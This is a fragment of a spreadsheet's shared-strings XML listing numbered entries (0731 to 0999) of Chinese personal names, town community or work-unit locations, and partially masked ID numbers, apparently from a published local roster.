  <si>
    <t>张德松</t>
  </si>
  <si>
    <t>0731</t>
  </si>
  <si>
    <t>周连芝</t>
  </si>
  <si>
    <t>0732</t>
  </si>
  <si>
    <t>张军</t>
  </si>
  <si>
    <t>0733</t>
  </si>
  <si>
    <t>王玉玲</t>
  </si>
  <si>
    <t>222404********0020</t>
  </si>
  <si>
    <t>0734</t>
  </si>
  <si>
    <t>王曼笛</t>
  </si>
  <si>
    <t>411321********0366</t>
  </si>
  <si>
    <t>0735</t>
  </si>
  <si>
    <t>张彩瑞</t>
  </si>
  <si>
    <t>411321********0060</t>
  </si>
  <si>
    <t>0736</t>
  </si>
  <si>
    <t>沙玉亭</t>
  </si>
  <si>
    <t>412921********0177</t>
  </si>
  <si>
    <t>0737</t>
  </si>
  <si>
    <t>李聪聪</t>
  </si>
  <si>
    <t>411321********0322</t>
  </si>
  <si>
    <t>0738</t>
  </si>
  <si>
    <t>李华珍</t>
  </si>
  <si>
    <t>412921********0860</t>
  </si>
  <si>
    <t>0739</t>
  </si>
  <si>
    <t>曹德东</t>
  </si>
  <si>
    <t>0740</t>
  </si>
  <si>
    <t>王继新</t>
  </si>
  <si>
    <t>0741</t>
  </si>
  <si>
    <t>赵志祥</t>
  </si>
  <si>
    <t>0742</t>
  </si>
  <si>
    <t>陈立兰</t>
  </si>
  <si>
    <t>0743</t>
  </si>
  <si>
    <t>薛志梅</t>
  </si>
  <si>
    <t>0744</t>
  </si>
  <si>
    <t>刘闯</t>
  </si>
  <si>
    <t>411326********0030</t>
  </si>
  <si>
    <t>0745</t>
  </si>
  <si>
    <t>毛德安</t>
  </si>
  <si>
    <t>412921********881X</t>
  </si>
  <si>
    <t>0746</t>
  </si>
  <si>
    <t>城关镇南外村</t>
  </si>
  <si>
    <t>王琳琳</t>
  </si>
  <si>
    <t>4113210104</t>
  </si>
  <si>
    <t>0747</t>
  </si>
  <si>
    <t>张敏</t>
  </si>
  <si>
    <t>0748</t>
  </si>
  <si>
    <t>中华社区四组</t>
  </si>
  <si>
    <t>刘国印</t>
  </si>
  <si>
    <t>0749</t>
  </si>
  <si>
    <t>杨家萍</t>
  </si>
  <si>
    <t>0750</t>
  </si>
  <si>
    <t>中华社区九组</t>
  </si>
  <si>
    <t>刘保安</t>
  </si>
  <si>
    <t>412921********1556</t>
  </si>
  <si>
    <t>0751</t>
  </si>
  <si>
    <t>张玉存</t>
  </si>
  <si>
    <t>412921********168X</t>
  </si>
  <si>
    <t>0752</t>
  </si>
  <si>
    <t>西北社区二组</t>
  </si>
  <si>
    <t>郭延龙</t>
  </si>
  <si>
    <t>0753</t>
  </si>
  <si>
    <t>西北社区四组</t>
  </si>
  <si>
    <t>栗勇</t>
  </si>
  <si>
    <t>0754</t>
  </si>
  <si>
    <t>栗明</t>
  </si>
  <si>
    <t>411326********0054</t>
  </si>
  <si>
    <t>0755</t>
  </si>
  <si>
    <t>席清栓</t>
  </si>
  <si>
    <t>0756</t>
  </si>
  <si>
    <t>李兴玉</t>
  </si>
  <si>
    <t>411326********0036</t>
  </si>
  <si>
    <t>0757</t>
  </si>
  <si>
    <t>东北社区六组</t>
  </si>
  <si>
    <t>李民</t>
  </si>
  <si>
    <t>412921********0092</t>
  </si>
  <si>
    <t>0758</t>
  </si>
  <si>
    <t>东北社区一组</t>
  </si>
  <si>
    <t>孙欣鑫</t>
  </si>
  <si>
    <t>411326********0050</t>
  </si>
  <si>
    <t>0759</t>
  </si>
  <si>
    <t>李河</t>
  </si>
  <si>
    <t>0760</t>
  </si>
  <si>
    <t>宋宽龙</t>
  </si>
  <si>
    <t>412921********0455</t>
  </si>
  <si>
    <t>0761</t>
  </si>
  <si>
    <t>赵倩</t>
  </si>
  <si>
    <t>410103********0187</t>
  </si>
  <si>
    <t>0762</t>
  </si>
  <si>
    <t>北外六组</t>
  </si>
  <si>
    <t>李连英</t>
  </si>
  <si>
    <t>0763</t>
  </si>
  <si>
    <t>城关镇中华社区</t>
  </si>
  <si>
    <t>杨明芝</t>
  </si>
  <si>
    <t>0764</t>
  </si>
  <si>
    <t>赵峰</t>
  </si>
  <si>
    <t>0765</t>
  </si>
  <si>
    <t>汪秀英</t>
  </si>
  <si>
    <t>0766</t>
  </si>
  <si>
    <t>北外五组</t>
  </si>
  <si>
    <t>李凤</t>
  </si>
  <si>
    <t>0767</t>
  </si>
  <si>
    <t>城关镇东北社区</t>
  </si>
  <si>
    <t>吴一帆</t>
  </si>
  <si>
    <t>0768</t>
  </si>
  <si>
    <t>西北社区</t>
  </si>
  <si>
    <t>李国有</t>
  </si>
  <si>
    <t>0769</t>
  </si>
  <si>
    <t>中华社区</t>
  </si>
  <si>
    <t>王六青</t>
  </si>
  <si>
    <t>0770</t>
  </si>
  <si>
    <t>东北社区</t>
  </si>
  <si>
    <t>马青框</t>
  </si>
  <si>
    <t>0771</t>
  </si>
  <si>
    <t>李同义</t>
  </si>
  <si>
    <t>0772</t>
  </si>
  <si>
    <t>北外社区</t>
  </si>
  <si>
    <t>李树新</t>
  </si>
  <si>
    <t>0773</t>
  </si>
  <si>
    <t>杨雯</t>
  </si>
  <si>
    <t>0774</t>
  </si>
  <si>
    <t>郭林军</t>
  </si>
  <si>
    <t>0775</t>
  </si>
  <si>
    <t>张高申</t>
  </si>
  <si>
    <t>0776</t>
  </si>
  <si>
    <t>闫学营</t>
  </si>
  <si>
    <t>411326********0047</t>
  </si>
  <si>
    <t>0777</t>
  </si>
  <si>
    <t>聂新强</t>
  </si>
  <si>
    <t>412921********5511</t>
  </si>
  <si>
    <t>0778</t>
  </si>
  <si>
    <t>聂湫林</t>
  </si>
  <si>
    <t>411321********0278</t>
  </si>
  <si>
    <t>0779</t>
  </si>
  <si>
    <t>朱三燕</t>
  </si>
  <si>
    <t>0780</t>
  </si>
  <si>
    <t>张立</t>
  </si>
  <si>
    <t>0781</t>
  </si>
  <si>
    <t>随献奎</t>
  </si>
  <si>
    <t>0782</t>
  </si>
  <si>
    <t>代杰</t>
  </si>
  <si>
    <t>0783</t>
  </si>
  <si>
    <t>郭洺珲</t>
  </si>
  <si>
    <t>411321********0036</t>
  </si>
  <si>
    <t>0784</t>
  </si>
  <si>
    <t>任明凤</t>
  </si>
  <si>
    <t>412921********0467</t>
  </si>
  <si>
    <t>0785</t>
  </si>
  <si>
    <t>崔书亮</t>
  </si>
  <si>
    <t>0786</t>
  </si>
  <si>
    <t>宋学敏</t>
  </si>
  <si>
    <t>0787</t>
  </si>
  <si>
    <t>李仁常</t>
  </si>
  <si>
    <t>0788</t>
  </si>
  <si>
    <t>程建生</t>
  </si>
  <si>
    <t>0789</t>
  </si>
  <si>
    <t>城关镇电业局</t>
  </si>
  <si>
    <t>史鸿臻</t>
  </si>
  <si>
    <t>411326********0014</t>
  </si>
  <si>
    <t>0790</t>
  </si>
  <si>
    <t>吴明倡</t>
  </si>
  <si>
    <t>411326********0112</t>
  </si>
  <si>
    <t>0791</t>
  </si>
  <si>
    <t>张庆洋</t>
  </si>
  <si>
    <t>0792</t>
  </si>
  <si>
    <t>李万春</t>
  </si>
  <si>
    <t>0793</t>
  </si>
  <si>
    <t>王爱珍</t>
  </si>
  <si>
    <t>0794</t>
  </si>
  <si>
    <t>城关镇西北社区</t>
  </si>
  <si>
    <t>熊秀奇</t>
  </si>
  <si>
    <t>0795</t>
  </si>
  <si>
    <t>王玉甫</t>
  </si>
  <si>
    <t>0796</t>
  </si>
  <si>
    <t>城关镇北外社区</t>
  </si>
  <si>
    <t>武威</t>
  </si>
  <si>
    <t>0797</t>
  </si>
  <si>
    <t>翟玉凤</t>
  </si>
  <si>
    <t>412921********0189</t>
  </si>
  <si>
    <t>0798</t>
  </si>
  <si>
    <t>张建军</t>
  </si>
  <si>
    <t>0799</t>
  </si>
  <si>
    <t>李植鑫</t>
  </si>
  <si>
    <t>410325********0392</t>
  </si>
  <si>
    <t>0800</t>
  </si>
  <si>
    <t>席国梅</t>
  </si>
  <si>
    <t>0801</t>
  </si>
  <si>
    <t>方元媛</t>
  </si>
  <si>
    <t>411321********3428</t>
  </si>
  <si>
    <t>0802</t>
  </si>
  <si>
    <t>方梓豪</t>
  </si>
  <si>
    <t>411321********0118</t>
  </si>
  <si>
    <t>0803</t>
  </si>
  <si>
    <t>张长勤</t>
  </si>
  <si>
    <t>0804</t>
  </si>
  <si>
    <t>林广云</t>
  </si>
  <si>
    <t>0805</t>
  </si>
  <si>
    <t>任行玉</t>
  </si>
  <si>
    <t>0806</t>
  </si>
  <si>
    <t>杨兴珍</t>
  </si>
  <si>
    <t>0807</t>
  </si>
  <si>
    <t>东北社区
县社</t>
  </si>
  <si>
    <t>吴俊州</t>
  </si>
  <si>
    <t>412921********5111</t>
  </si>
  <si>
    <t>0808</t>
  </si>
  <si>
    <t>东北社区
外贸局</t>
  </si>
  <si>
    <t>徐召伟</t>
  </si>
  <si>
    <t>0809</t>
  </si>
  <si>
    <t>东北社区
黄金局</t>
  </si>
  <si>
    <t>李同生</t>
  </si>
  <si>
    <t>0810</t>
  </si>
  <si>
    <t>东北社区蚕业局</t>
  </si>
  <si>
    <t>张文钦</t>
  </si>
  <si>
    <t>0811</t>
  </si>
  <si>
    <t>南外社区中医院</t>
  </si>
  <si>
    <t>李长兴</t>
  </si>
  <si>
    <t>0812</t>
  </si>
  <si>
    <t>杨振华</t>
  </si>
  <si>
    <t>0813</t>
  </si>
  <si>
    <t>南外社区印刷厂</t>
  </si>
  <si>
    <t>华蕊</t>
  </si>
  <si>
    <t>0814</t>
  </si>
  <si>
    <t>张园园</t>
  </si>
  <si>
    <t>411326********5121</t>
  </si>
  <si>
    <t>0815</t>
  </si>
  <si>
    <t>张恩华</t>
  </si>
  <si>
    <t>411321********0075</t>
  </si>
  <si>
    <t>0816</t>
  </si>
  <si>
    <t>赵闯</t>
  </si>
  <si>
    <t>412921********4016</t>
  </si>
  <si>
    <t>0817</t>
  </si>
  <si>
    <t>徐成峰</t>
  </si>
  <si>
    <t>412921********404X</t>
  </si>
  <si>
    <t>0818</t>
  </si>
  <si>
    <t>王涛</t>
  </si>
  <si>
    <t>412921********2856</t>
  </si>
  <si>
    <t>0819</t>
  </si>
  <si>
    <t>南外社区教育局</t>
  </si>
  <si>
    <t>吕云朋</t>
  </si>
  <si>
    <t>0820</t>
  </si>
  <si>
    <t>李红伟</t>
  </si>
  <si>
    <t>412921********1135</t>
  </si>
  <si>
    <t>0821</t>
  </si>
  <si>
    <t>南外社区文化局</t>
  </si>
  <si>
    <t>王冬梅</t>
  </si>
  <si>
    <t>0822</t>
  </si>
  <si>
    <t>西北社区商业中心</t>
  </si>
  <si>
    <t>陈贞均</t>
  </si>
  <si>
    <t>412921********4434</t>
  </si>
  <si>
    <t>0823</t>
  </si>
  <si>
    <t>张文宇</t>
  </si>
  <si>
    <t>0824</t>
  </si>
  <si>
    <t>西北社区工信局</t>
  </si>
  <si>
    <t>贺小华</t>
  </si>
  <si>
    <t>0825</t>
  </si>
  <si>
    <t>西北社区卫生局</t>
  </si>
  <si>
    <t>王聚荣</t>
  </si>
  <si>
    <t>0826</t>
  </si>
  <si>
    <t>魏清军</t>
  </si>
  <si>
    <t>412921********0114</t>
  </si>
  <si>
    <t>0827</t>
  </si>
  <si>
    <t>韩峰</t>
  </si>
  <si>
    <t>0828</t>
  </si>
  <si>
    <t>闫涛</t>
  </si>
  <si>
    <t>0829</t>
  </si>
  <si>
    <t>西北社区教育局</t>
  </si>
  <si>
    <t>郭心盈</t>
  </si>
  <si>
    <t>0830</t>
  </si>
  <si>
    <t>李梦博</t>
  </si>
  <si>
    <t>411321********0199</t>
  </si>
  <si>
    <t>0831</t>
  </si>
  <si>
    <t>刘岩</t>
  </si>
  <si>
    <t>0832</t>
  </si>
  <si>
    <t>宋苑苑</t>
  </si>
  <si>
    <t>411326********0065</t>
  </si>
  <si>
    <t>0833</t>
  </si>
  <si>
    <t>王世献</t>
  </si>
  <si>
    <t>412921********2019</t>
  </si>
  <si>
    <t>0834</t>
  </si>
  <si>
    <t>黄彪</t>
  </si>
  <si>
    <t>0835</t>
  </si>
  <si>
    <t>董可九</t>
  </si>
  <si>
    <t>0836</t>
  </si>
  <si>
    <t>西北社区县社</t>
  </si>
  <si>
    <t>任柯</t>
  </si>
  <si>
    <t>0837</t>
  </si>
  <si>
    <t>李兴平</t>
  </si>
  <si>
    <t>0838</t>
  </si>
  <si>
    <t>李硕</t>
  </si>
  <si>
    <t>0839</t>
  </si>
  <si>
    <t>郭庆敏</t>
  </si>
  <si>
    <t>0840</t>
  </si>
  <si>
    <t>靳立军</t>
  </si>
  <si>
    <t>412921********4411</t>
  </si>
  <si>
    <t>0841</t>
  </si>
  <si>
    <t>张万丽</t>
  </si>
  <si>
    <t>412921********4426</t>
  </si>
  <si>
    <t>0842</t>
  </si>
  <si>
    <t>田万刚</t>
  </si>
  <si>
    <t>412921********3812</t>
  </si>
  <si>
    <t>0843</t>
  </si>
  <si>
    <t>西北社区粮食局</t>
  </si>
  <si>
    <t>王天义</t>
  </si>
  <si>
    <t>0844</t>
  </si>
  <si>
    <t>张瑞霞</t>
  </si>
  <si>
    <t>0845</t>
  </si>
  <si>
    <t>张刚</t>
  </si>
  <si>
    <t>0846</t>
  </si>
  <si>
    <t>刘小刚</t>
  </si>
  <si>
    <t>0847</t>
  </si>
  <si>
    <t>杜建东</t>
  </si>
  <si>
    <t>412921********1871</t>
  </si>
  <si>
    <t>0848</t>
  </si>
  <si>
    <t>贺之献</t>
  </si>
  <si>
    <t>0849</t>
  </si>
  <si>
    <t>鲁德锋</t>
  </si>
  <si>
    <t>412921********245X</t>
  </si>
  <si>
    <t>0850</t>
  </si>
  <si>
    <t>董兆斌</t>
  </si>
  <si>
    <t>412921********4496</t>
  </si>
  <si>
    <t>0851</t>
  </si>
  <si>
    <t>段彬</t>
  </si>
  <si>
    <t>412921********4447</t>
  </si>
  <si>
    <t>0852</t>
  </si>
  <si>
    <t>袁金圃</t>
  </si>
  <si>
    <t>0853</t>
  </si>
  <si>
    <t>李瑞</t>
  </si>
  <si>
    <t>412921********5006</t>
  </si>
  <si>
    <t>0854</t>
  </si>
  <si>
    <t>徐英</t>
  </si>
  <si>
    <t>412921********0422</t>
  </si>
  <si>
    <t>0855</t>
  </si>
  <si>
    <t>段兴珍</t>
  </si>
  <si>
    <t>412921********042X</t>
  </si>
  <si>
    <t>0856</t>
  </si>
  <si>
    <t>乔道峰</t>
  </si>
  <si>
    <t>412921********0050</t>
  </si>
  <si>
    <t>0857</t>
  </si>
  <si>
    <t>姜德高</t>
  </si>
  <si>
    <t>412921********1631</t>
  </si>
  <si>
    <t>0858</t>
  </si>
  <si>
    <t>于献波</t>
  </si>
  <si>
    <t>0859</t>
  </si>
  <si>
    <t>曾峰</t>
  </si>
  <si>
    <t>412921********1635</t>
  </si>
  <si>
    <t>0860</t>
  </si>
  <si>
    <t>杨金生</t>
  </si>
  <si>
    <t>0861</t>
  </si>
  <si>
    <t>杨惠雯</t>
  </si>
  <si>
    <t>411321********6281</t>
  </si>
  <si>
    <t>0862</t>
  </si>
  <si>
    <t>杨智斌</t>
  </si>
  <si>
    <t>411321********0154</t>
  </si>
  <si>
    <t>0863</t>
  </si>
  <si>
    <t>翟新兰</t>
  </si>
  <si>
    <t>0864</t>
  </si>
  <si>
    <t>张一倩</t>
  </si>
  <si>
    <t>411321********0029</t>
  </si>
  <si>
    <t>0865</t>
  </si>
  <si>
    <t>张同国</t>
  </si>
  <si>
    <t>0866</t>
  </si>
  <si>
    <t>张红敏</t>
  </si>
  <si>
    <t>0867</t>
  </si>
  <si>
    <t>刘泓远</t>
  </si>
  <si>
    <t>411321********0055</t>
  </si>
  <si>
    <t>0868</t>
  </si>
  <si>
    <t>王延东</t>
  </si>
  <si>
    <t>0869</t>
  </si>
  <si>
    <t>黄强</t>
  </si>
  <si>
    <t>412921********0096</t>
  </si>
  <si>
    <t>0870</t>
  </si>
  <si>
    <t>黄智珲</t>
  </si>
  <si>
    <t>411727********5211</t>
  </si>
  <si>
    <t>0871</t>
  </si>
  <si>
    <t>石军贵</t>
  </si>
  <si>
    <t>0872</t>
  </si>
  <si>
    <t>西北社区文化局</t>
  </si>
  <si>
    <t>张小山</t>
  </si>
  <si>
    <t>0873</t>
  </si>
  <si>
    <t>张小平</t>
  </si>
  <si>
    <t>0874</t>
  </si>
  <si>
    <t>张国东</t>
  </si>
  <si>
    <t>0875</t>
  </si>
  <si>
    <t>李培支</t>
  </si>
  <si>
    <t>0876</t>
  </si>
  <si>
    <t>索国明</t>
  </si>
  <si>
    <t>0877</t>
  </si>
  <si>
    <t>余海洋</t>
  </si>
  <si>
    <t>0878</t>
  </si>
  <si>
    <t>中华社区物资局</t>
  </si>
  <si>
    <t>卢中敏</t>
  </si>
  <si>
    <t>412921********4841</t>
  </si>
  <si>
    <t>0879</t>
  </si>
  <si>
    <t>中华社区就业办</t>
  </si>
  <si>
    <t>张浩</t>
  </si>
  <si>
    <t>0880</t>
  </si>
  <si>
    <t>张鲁豫</t>
  </si>
  <si>
    <t>0881</t>
  </si>
  <si>
    <t>中华社区工信局</t>
  </si>
  <si>
    <t>张居青</t>
  </si>
  <si>
    <t>0882</t>
  </si>
  <si>
    <t>中华社区缫丝厂</t>
  </si>
  <si>
    <t>赵国欣</t>
  </si>
  <si>
    <t>0883</t>
  </si>
  <si>
    <t>刘宏春</t>
  </si>
  <si>
    <t>412921********1119</t>
  </si>
  <si>
    <t>0884</t>
  </si>
  <si>
    <t>贾青有</t>
  </si>
  <si>
    <t>0885</t>
  </si>
  <si>
    <t>贺保丽</t>
  </si>
  <si>
    <t>0886</t>
  </si>
  <si>
    <t>中华社区民政局</t>
  </si>
  <si>
    <t>张文强</t>
  </si>
  <si>
    <t>0887</t>
  </si>
  <si>
    <t>詹秀辉</t>
  </si>
  <si>
    <t>0888</t>
  </si>
  <si>
    <t>常津</t>
  </si>
  <si>
    <t>411321********5176</t>
  </si>
  <si>
    <t>0889</t>
  </si>
  <si>
    <t>中华社区乡镇局</t>
  </si>
  <si>
    <t>潘姣霞</t>
  </si>
  <si>
    <t>0890</t>
  </si>
  <si>
    <t>中华社区粮食局</t>
  </si>
  <si>
    <t>王铁生</t>
  </si>
  <si>
    <t>0891</t>
  </si>
  <si>
    <t>栗红</t>
  </si>
  <si>
    <t>0892</t>
  </si>
  <si>
    <t>祖少卿</t>
  </si>
  <si>
    <t>412921********0155</t>
  </si>
  <si>
    <t>0893</t>
  </si>
  <si>
    <t>中华社区商业中心</t>
  </si>
  <si>
    <t>岳建</t>
  </si>
  <si>
    <t>412921********0151</t>
  </si>
  <si>
    <t>0894</t>
  </si>
  <si>
    <t>张小虎</t>
  </si>
  <si>
    <t>0895</t>
  </si>
  <si>
    <t>孙玉良</t>
  </si>
  <si>
    <t>0896</t>
  </si>
  <si>
    <t>闫荣华</t>
  </si>
  <si>
    <t>0897</t>
  </si>
  <si>
    <t>关红军</t>
  </si>
  <si>
    <t>412921********0098</t>
  </si>
  <si>
    <t>0898</t>
  </si>
  <si>
    <t>余运富</t>
  </si>
  <si>
    <t>0899</t>
  </si>
  <si>
    <t>朱德敏</t>
  </si>
  <si>
    <t>0900</t>
  </si>
  <si>
    <t>中华社区外贸局</t>
  </si>
  <si>
    <t>张军平</t>
  </si>
  <si>
    <t>0901</t>
  </si>
  <si>
    <t>闫荣均</t>
  </si>
  <si>
    <t>0902</t>
  </si>
  <si>
    <t>李朝阳</t>
  </si>
  <si>
    <t>0903</t>
  </si>
  <si>
    <t>徐桂萍</t>
  </si>
  <si>
    <t>0904</t>
  </si>
  <si>
    <t>赵刚</t>
  </si>
  <si>
    <t>0905</t>
  </si>
  <si>
    <t>张重一</t>
  </si>
  <si>
    <t>411326********005X</t>
  </si>
  <si>
    <t>0906</t>
  </si>
  <si>
    <t>张俊然</t>
  </si>
  <si>
    <t>411321********0021</t>
  </si>
  <si>
    <t>0907</t>
  </si>
  <si>
    <t>张俊涵</t>
  </si>
  <si>
    <t>411321********0107</t>
  </si>
  <si>
    <t>0908</t>
  </si>
  <si>
    <t>马新斐</t>
  </si>
  <si>
    <t>411321********006X</t>
  </si>
  <si>
    <t>0909</t>
  </si>
  <si>
    <t>李栋</t>
  </si>
  <si>
    <t>0910</t>
  </si>
  <si>
    <t>张天亮</t>
  </si>
  <si>
    <t>412921********0171</t>
  </si>
  <si>
    <t>0911</t>
  </si>
  <si>
    <t>田万红</t>
  </si>
  <si>
    <t>412921********3648</t>
  </si>
  <si>
    <t>0912</t>
  </si>
  <si>
    <t>张天景</t>
  </si>
  <si>
    <t>0913</t>
  </si>
  <si>
    <t>高丽</t>
  </si>
  <si>
    <t>0914</t>
  </si>
  <si>
    <t>孙俊宝</t>
  </si>
  <si>
    <t>0915</t>
  </si>
  <si>
    <t>0916</t>
  </si>
  <si>
    <t>中华社区农机局</t>
  </si>
  <si>
    <t>宋长栓</t>
  </si>
  <si>
    <t>0917</t>
  </si>
  <si>
    <t>中华社区林业局</t>
  </si>
  <si>
    <t>王云霏</t>
  </si>
  <si>
    <t>411321********0746</t>
  </si>
  <si>
    <t>0918</t>
  </si>
  <si>
    <t>张德成</t>
  </si>
  <si>
    <t>0919</t>
  </si>
  <si>
    <t>李金春</t>
  </si>
  <si>
    <t>0920</t>
  </si>
  <si>
    <t>李金华</t>
  </si>
  <si>
    <t>412921********1622</t>
  </si>
  <si>
    <t>0921</t>
  </si>
  <si>
    <t>杨新生</t>
  </si>
  <si>
    <t>412921********1573</t>
  </si>
  <si>
    <t>0922</t>
  </si>
  <si>
    <t>杨韵彰</t>
  </si>
  <si>
    <t>411321********0476</t>
  </si>
  <si>
    <t>0923</t>
  </si>
  <si>
    <t>樊建峰</t>
  </si>
  <si>
    <t>412921********155X</t>
  </si>
  <si>
    <t>0924</t>
  </si>
  <si>
    <t>王文召</t>
  </si>
  <si>
    <t>0925</t>
  </si>
  <si>
    <t>王灿</t>
  </si>
  <si>
    <t>0926</t>
  </si>
  <si>
    <t>王成丽</t>
  </si>
  <si>
    <t>0927</t>
  </si>
  <si>
    <t>胡延红</t>
  </si>
  <si>
    <t>0928</t>
  </si>
  <si>
    <t>和召阳</t>
  </si>
  <si>
    <t>0929</t>
  </si>
  <si>
    <t>和煜铭</t>
  </si>
  <si>
    <t>411321********3055</t>
  </si>
  <si>
    <t>0930</t>
  </si>
  <si>
    <t>中华社区电线厂</t>
  </si>
  <si>
    <t>黄书全</t>
  </si>
  <si>
    <t>0931</t>
  </si>
  <si>
    <t>高营</t>
  </si>
  <si>
    <t>0932</t>
  </si>
  <si>
    <t>中华社区交通局</t>
  </si>
  <si>
    <t>彭春英</t>
  </si>
  <si>
    <t>0933</t>
  </si>
  <si>
    <t>杜培军</t>
  </si>
  <si>
    <t>0934</t>
  </si>
  <si>
    <t>隋闯奎</t>
  </si>
  <si>
    <t>0935</t>
  </si>
  <si>
    <t>王九瑞</t>
  </si>
  <si>
    <t>412921********3466</t>
  </si>
  <si>
    <t>0936</t>
  </si>
  <si>
    <t>尹延武</t>
  </si>
  <si>
    <t>0937</t>
  </si>
  <si>
    <t>濮延慧</t>
  </si>
  <si>
    <t>0938</t>
  </si>
  <si>
    <t>陆万芝</t>
  </si>
  <si>
    <t>0939</t>
  </si>
  <si>
    <t>程远生</t>
  </si>
  <si>
    <t>0940</t>
  </si>
  <si>
    <t>李少红</t>
  </si>
  <si>
    <t>0941</t>
  </si>
  <si>
    <t>冯元培</t>
  </si>
  <si>
    <t>0942</t>
  </si>
  <si>
    <t>职慧</t>
  </si>
  <si>
    <t>0943</t>
  </si>
  <si>
    <t>郭鹏宇</t>
  </si>
  <si>
    <t>0944</t>
  </si>
  <si>
    <t>郭鹏菲</t>
  </si>
  <si>
    <t>411321********5145</t>
  </si>
  <si>
    <t>0945</t>
  </si>
  <si>
    <t>毛金兰</t>
  </si>
  <si>
    <t>0946</t>
  </si>
  <si>
    <t>杨金娜</t>
  </si>
  <si>
    <t>0947</t>
  </si>
  <si>
    <t>林书战</t>
  </si>
  <si>
    <t>0948</t>
  </si>
  <si>
    <t>杨大军</t>
  </si>
  <si>
    <t>0949</t>
  </si>
  <si>
    <t>尹芳春</t>
  </si>
  <si>
    <t>412921********6002</t>
  </si>
  <si>
    <t>0950</t>
  </si>
  <si>
    <t>王俊杰</t>
  </si>
  <si>
    <t>412921********4422</t>
  </si>
  <si>
    <t>0951</t>
  </si>
  <si>
    <t>蔡沅卓</t>
  </si>
  <si>
    <t>0952</t>
  </si>
  <si>
    <t>郭兰</t>
  </si>
  <si>
    <t>412921********0729</t>
  </si>
  <si>
    <t>0953</t>
  </si>
  <si>
    <t>张清彦</t>
  </si>
  <si>
    <t>412921********101X</t>
  </si>
  <si>
    <t>0954</t>
  </si>
  <si>
    <t>孙小平</t>
  </si>
  <si>
    <t>0955</t>
  </si>
  <si>
    <t>王林普</t>
  </si>
  <si>
    <t>411326********4014</t>
  </si>
  <si>
    <t>0956</t>
  </si>
  <si>
    <t>余金春</t>
  </si>
  <si>
    <t>0957</t>
  </si>
  <si>
    <t>孙献伟</t>
  </si>
  <si>
    <t>0958</t>
  </si>
  <si>
    <t>张金枝</t>
  </si>
  <si>
    <t>0959</t>
  </si>
  <si>
    <t>李道林</t>
  </si>
  <si>
    <t>412921********1198</t>
  </si>
  <si>
    <t>0960</t>
  </si>
  <si>
    <t>刘旗</t>
  </si>
  <si>
    <t>0961</t>
  </si>
  <si>
    <t>王素云</t>
  </si>
  <si>
    <t>412921********1566</t>
  </si>
  <si>
    <t>0962</t>
  </si>
  <si>
    <t>李春芳</t>
  </si>
  <si>
    <t>0963</t>
  </si>
  <si>
    <t>潘长松</t>
  </si>
  <si>
    <t>412921********3651</t>
  </si>
  <si>
    <t>0964</t>
  </si>
  <si>
    <t>戴东</t>
  </si>
  <si>
    <t>0965</t>
  </si>
  <si>
    <t>中华社区蚕业局</t>
  </si>
  <si>
    <t>张金桥</t>
  </si>
  <si>
    <t>412921********3314</t>
  </si>
  <si>
    <t>0966</t>
  </si>
  <si>
    <t>中华社区饮食服务公司</t>
  </si>
  <si>
    <t>张聚奇</t>
  </si>
  <si>
    <t>0967</t>
  </si>
  <si>
    <t>晋军</t>
  </si>
  <si>
    <t>0968</t>
  </si>
  <si>
    <t>中华社区巢丝厂</t>
  </si>
  <si>
    <t>朱舜禹</t>
  </si>
  <si>
    <t>0969</t>
  </si>
  <si>
    <t>黄珍</t>
  </si>
  <si>
    <t>412921********013X</t>
  </si>
  <si>
    <t>0970</t>
  </si>
  <si>
    <t>黄梦钰</t>
  </si>
  <si>
    <t>411321********5966</t>
  </si>
  <si>
    <t>0971</t>
  </si>
  <si>
    <t>宋明莘</t>
  </si>
  <si>
    <t>411321********035X</t>
  </si>
  <si>
    <t>0972</t>
  </si>
  <si>
    <t>宋明扬</t>
  </si>
  <si>
    <t>411321********0190</t>
  </si>
  <si>
    <t>0973</t>
  </si>
  <si>
    <t>李想</t>
  </si>
  <si>
    <t>0974</t>
  </si>
  <si>
    <t>梁浩楠</t>
  </si>
  <si>
    <t>411321********0034</t>
  </si>
  <si>
    <t>0975</t>
  </si>
  <si>
    <t>中华社区木材公司</t>
  </si>
  <si>
    <t>王春秀</t>
  </si>
  <si>
    <t>0976</t>
  </si>
  <si>
    <t>李世召</t>
  </si>
  <si>
    <t>0977</t>
  </si>
  <si>
    <t>王劲松</t>
  </si>
  <si>
    <t>0978</t>
  </si>
  <si>
    <t>王康桥</t>
  </si>
  <si>
    <t>0979</t>
  </si>
  <si>
    <t>陈秀芝</t>
  </si>
  <si>
    <t>0980</t>
  </si>
  <si>
    <t>赵旌博</t>
  </si>
  <si>
    <t>0981</t>
  </si>
  <si>
    <t>胡文克</t>
  </si>
  <si>
    <t>411326********5155</t>
  </si>
  <si>
    <t>0982</t>
  </si>
  <si>
    <t>胡靖雨</t>
  </si>
  <si>
    <t>411321********2892</t>
  </si>
  <si>
    <t>0983</t>
  </si>
  <si>
    <t>李胜文</t>
  </si>
  <si>
    <t>412921********153X</t>
  </si>
  <si>
    <t>0984</t>
  </si>
  <si>
    <t>田广珍</t>
  </si>
  <si>
    <t>412921********164X</t>
  </si>
  <si>
    <t>0985</t>
  </si>
  <si>
    <t>张会远</t>
  </si>
  <si>
    <t>0986</t>
  </si>
  <si>
    <t>薛健</t>
  </si>
  <si>
    <t>0987</t>
  </si>
  <si>
    <t>王建军</t>
  </si>
  <si>
    <t>0988</t>
  </si>
  <si>
    <t>刘军</t>
  </si>
  <si>
    <t>0989</t>
  </si>
  <si>
    <t>闫长荣</t>
  </si>
  <si>
    <t>412921********1529</t>
  </si>
  <si>
    <t>0990</t>
  </si>
  <si>
    <t>王茂晓</t>
  </si>
  <si>
    <t>411321********0212</t>
  </si>
  <si>
    <t>0991</t>
  </si>
  <si>
    <t>赵华</t>
  </si>
  <si>
    <t>412921********1586</t>
  </si>
  <si>
    <t>0992</t>
  </si>
  <si>
    <t>王景峰</t>
  </si>
  <si>
    <t>412921********5916</t>
  </si>
  <si>
    <t>0993</t>
  </si>
  <si>
    <t>孙伟</t>
  </si>
  <si>
    <t>0994</t>
  </si>
  <si>
    <t>民主社区石油公司</t>
  </si>
  <si>
    <t>王岩</t>
  </si>
  <si>
    <t>411326********004X</t>
  </si>
  <si>
    <t>4113210105</t>
  </si>
  <si>
    <t>0995</t>
  </si>
  <si>
    <t>民主社区工信局</t>
  </si>
  <si>
    <t>王长华</t>
  </si>
  <si>
    <t>0996</t>
  </si>
  <si>
    <t>田光连</t>
  </si>
  <si>
    <t>0997</t>
  </si>
  <si>
    <t>郭树峰</t>
  </si>
  <si>
    <t>0998</t>
  </si>
  <si>
    <t>蔡庆炜</t>
  </si>
  <si>
    <t>0999</t>
  </si>
